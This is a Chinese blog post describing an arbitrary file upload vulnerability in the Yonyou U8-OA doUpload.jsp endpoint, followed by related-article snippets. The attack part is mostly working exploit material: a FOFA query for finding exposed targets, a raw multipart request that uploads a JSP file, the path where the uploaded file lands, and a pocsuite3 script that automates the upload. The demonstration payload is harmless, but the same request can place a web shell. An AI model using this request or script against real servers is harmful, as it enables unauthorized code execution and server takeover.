某友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞(附漏洞检测脚本)

最新推荐文章于 2024-05-21 08:36:21 发布
最新推荐文章于 2024-05-21 08:36:21 发布
阅读量489 收藏 7
点赞数 7
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjj1029056414/article/details/136250419
版权

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传漏洞

fofa语句

title="用友U8-OA"

poc加检测

POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=7b1db34fff56ef636e9a5cebcd6c9a75

--7b1db34fff56ef636e9a5cebcd6c9a75
Content-Disposition: form-data; name="iconFile"; filename="info.jsp"
Content-Type: application/octet-stream

<% out.println("tteesstt1"); %>
--7b1db34fff56ef636e9a5cebcd6c9a75--

上传成功后评价url    ip//yyoa/portal/upload/xxx.jsp

poc脚本

脚本使用pocsuite框架

# _*_ coding:utf-8 _*_
# @Time : 2024/2/23
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class yongyouu8_doupload_upload(POCBase):
    pocDesc = '''用友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-10'
    name = '用友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞'
    #title="用友U8-OA"


    def _verify(self):

        result = {}
        url = self.url+ '/yyoa/portal/tools/doUpload.jsp'

        headers = {
            "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
            "Accept": "*/*",
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'close',
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "multipart/form-data; boundary=7b1db34fff56ef636e9a5cebcd6c9a75"
        }

        try:
            data = '--7b1db34fff56ef636e9a5cebcd6c9a75\r\nContent-Disposition: form-data; name="iconFile"; filename="info.jsp"\r\nContent-Type: application/octet-stream\r\n\r\n<% out.println("tteesstt1"); %>\r\n--7b1db34fff56ef636e9a5cebcd6c9a75--'

            response = requests.post(url, headers=headers, data=data)
            if response.status_code == 200 and 'jsp' in response.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(yongyouu8_doupload_upload)

炼金术师诸葛亮
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友U8+OA doUpload.jsp 文件上传漏洞复现
0xSec
02-08 619
用友U8+ OA doUpload.jsp 接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个web服务器。
致远A6-m协同管理软件任意文件上传漏洞复现
qq_36334672的博客
03-04 244
致远A6-m协同管理软件doUpload.jsp接口存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传恶意文件,从而控制服务器。
文件上传
05-05
通过jsp前端进行多文件上传 显示层代码: <%@ page language="java" import="java.util.*" pageEncoding="GBK"%> <%@ page import="com.jspsmart.upload.*" %> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>My JSP 'index.jsp' starting page</title> <script type="text/javascript"> function addFile(){ var myTB = document.getElementByIdx_x_x("myTB"); var rowNum = myTB.rows.length; var newRow = myTB.insertRow(rowNum); var cells_0 = newRow.insertCell(0); cells_0.innerHTML = "上传文件:"; var cells_1 = newRow.insertCell(1); cells_1.innerHTML = "<input type='file' name='nfile' />"; } </script> </head> <body> <form enctype="multipart/form-data" method="post" action="doUpload.jsp"> <table id="myTB"> <tr> <td>上传文件:</td> <td><input type="file" name="nfile" /></td> </tr> </table> <input type="button" value="添加" onclick="addFile()"><br> <input type="submit" value="上传"> </form> </body> </html> ============================================================================ 逻辑层代码: <%@ page language="java" import="java.util.*" pageEncoding="GBK"%> <%@ page import="com.jspsmart.upload.*" %> <% SmartUpload su = new SmartUpload(); su.initialize(pageContext); try{ su.setAllowedFilesList("jpg,jpeg,gif"); su.setDeniedFilesList("exe"); su.setMaxFileSize(1024*1024*1024*5); su.setTotalMaxFileSize(1024*1024*1024*20); su.setCharset("gbk"); su.upload(); }catch(Exception e){ out.print("您选择的文件非法或者长度超限,请检查!"); e.printStackTrace(); } for(int i=0;i<su.getFiles().getCount();i++){ File file = su.getFiles().getFile(i); if(!file.isMissing()){ Random rd = new Random(); Calendar cd = Calendar.getInstance(); String fileName = String.valueOf(cd.get(Calendar.YEAR))+String.valueOf(cd.get(Calendar.MONTH)+1)+String.valueOf(cd.get(Calendar.DATE))+ String.valueOf(cd.get(Calendar.MINUTE))+String.valueOf(cd.get(Calendar.SECOND))+String.valueOf(rd.nextInt(100))+"."+file.getFileExt(); String path = "upload\\"; path += fileName; file.saveAs(path,SmartUpload.SAVE_VIRTUAL); out.print("文件上传成功"); } } %>
用友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞
qq_36334672的博客
03-04 219
用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传恶意文件,从而控制服务器。
node.js文件上传重命名以及移动位置的示例代码
12-23
一个关于node上传文件的例子,下面是前端代码, doUpload() { var formData = new FormData($("#uploadForm")[0]); $.ajax({ url: 'http://localhost:3011/upload', type: 'POST', data: formData, async: false, cache: false, contentType: false, processData: false, success: function (returndata) { a
vue实现文件上传功能
01-19
vue 文件上传,供大家参考,具体内容如下 首先 先说一下想要实现的效果 就如截图所见,需要将企业和需要上传的文件提交到后台处理,那么接下来就说如何实现 vue 实现 vue 页面代码 选取文件
asp.net 一个封装比较完整的FTP类
01-20
先看这个简单的 代码如下:FTP ftp = new FTP(“192.168.1.117”, “ahuinan”, “123456”); string oldname = this.FileUpload1.PostedFile.FileName; string newname = dd + h + mm + ss + oldname.Substring(oldname.LastIndexOf(“.”)); // ftp.Connect(); ftp.OpenUpload(oldname,newname); while (ftp.DoUpload() > 0) { int perc = (in
【复现】用友U8 oa协同工作系统 文件上传漏洞_57
fushuang333的博客
02-24 928
【复现】用友U8 oa协同工作系统 文件上传漏洞,上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
用友U8+OA doUpload.jsp 文件上传漏洞
weixin_52204925的博客
02-08 761
用友U8+OA doUpload.jsp 文件上传漏洞
JSP 编写的图片上传
07-27
jsp编写的图片上传的功能 <%@ page contentType="text/html; charset=GBK" %> <%@ page import="ljh.database.*,java.util.*,ljh.util.*,java.sql.*"%> <% String newFilename=DateUtil.getRandom(); FileUploadBean upload=new FileUploadBean(); String Dir = request.getRealPath("/patrol/upload"); upload.setSavePath(Dir); upload.saveAs(newFilename); upload.doUpload(request); %> <SCRIPT LANGUAGE="JavaScript"> <!-- alert("上传完成!"); parent.document.pic.a.value="<%=upload.getFilename()%>" window.location = 'upme2.htm'; //--> </SCRIPT> <HTML><HEAD><TITLE>上传件</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <LINK href="../function/common.css" rel=stylesheet type=text/css> <LINK href="../images/css.css" type=text/css rel=stylesheet> <link rel="STYLESHEET" type="text/css" href="edit.css"> <link rel="stylesheet" type="text/css" href="../editer/site.css"> <SCRIPT language=JavaScript event=onclick for=Ok> window.returnValue = a.value+"*" window.close(); </SCRIPT> <META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD> <BODY bgColor=menu > <FORM name=pic><IFRAME name=ad src="upme2.htm" frameBorder=0 width="100%" scrolling=no height=20></IFRAME><BR>  上传限制:2000K<BR>  件地址: <INPUT id=a style="WIDTH: 200px" value="" name=a style="border: 1px solid #0000FF" size="15"> <br><CENTER><INPUT id=Ok title=点击“插入”按钮, style="border: 1px solid #0000FF" type=button value=保存></CENTER></FORM></BODY></HTML>
php实现文件上传基本验证
12-20
本文实例为大家分享了php实现文件上传基本验证的具体代码,供大家参考,具体内容如下 Html部分 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>文件上传</title> </head> <body> <form action="doupload.php" method="post" enctype="multipart/form-data"> <input type="file" name="myFile"/> <input type="hidden" name="MAX_FILE_SIZ
使用jquery.upload.js实现异步上传示例代码
01-19
相关资源下载:upload 1:jsp代码: 导入jquery.upload.js和jquery-1.7.2.js 添加调用js的代码:上传 在底部写: <iframe style=position:absolute;top:-9999px src=<%=basePath%>/resources/upload/upload.htm/></iframe> 2:js代码: /*文件上传*/ function doUpload() {
万户OA upload.jsp任意文件上传
weixin_43567873的博客
03-06 35
万户OA upload.jsp任意文件上传
软考高级架构师:软件系统安全相关概念完整性、不可否认性、可控性、机密性、安全审计
明明如月的技术博客
05-19 276
了解软件系统安全的几个重要概念:完整性、不可否认性、可控性、机密性和安全审计,可以通过一些日常生活中的例子来帮助理解。
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 770
作用就是定义属性之间的数学关系
保障餐饮场所安全:可燃气体报警器专业检测的必要性
最新发布
BDjiance的博客
05-21 229
可燃气体报警器是一种用于监测空气中可燃气体浓度的设备,一旦检测到可燃气体浓度超过设定的安全范围,就会发出警报,提醒人们及时采取措施,避免火灾事故的发生。在日常经营中,餐饮场所也应当加强对可燃气体报警器的日常维护和保养,定期清洁和检查,确保其在平时的使用中处于良好的状态。其次,定期检测也可以校准报警器的灵敏度,确保其能够及时、准确地检测到可燃气体的泄漏情况,提供更可靠的安全保障。综上所述,餐饮场所应当认真对待可燃气体报警器的专业检测周期,选择正规的专业机构进行检测和校准,保障其安全可靠。
SpringBoot使用MultipartFile类上传文件,@Async异步处理报文件不存在异常
03-28
可能是因为异步处理方法执行时,上传文件的流已经关闭了,导致文件不存在异常。可以将上传文件的流传递到异步处理方法中,或者使用Spring的TaskExecutor来异步处理文件上传。具体实现方法可以参考以下代码: ``` @PostMapping("/upload") public String handleFileUpload(@RequestParam("file") MultipartFile file) throws IOException { // 保存上传文件 String fileName = StringUtils.cleanPath(file.getOriginalFilename()); File tempFile = new File(fileName); file.transferTo(tempFile); // 异步处理上传文件 taskExecutor.execute(() -> { try { // 使用保存在本地的临时文件处理上传任务 doUpload(tempFile); } catch (IOException e) { e.printStackTrace(); } finally { // 删除临时文件 tempFile.delete(); } }); return "File uploaded successfully!"; } @Async public void doUpload(File file) throws IOException { // 处理上传文件任务 // ... } ``` 在上传文件时,先将文件保存在本地的临时文件中,然后使用TaskExecutor来执行异步处理任务。在异步处理方法中,使用保存在本地的临时文件处理上传任务,最后删除临时文件。这样就避免了文件不存在异常的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值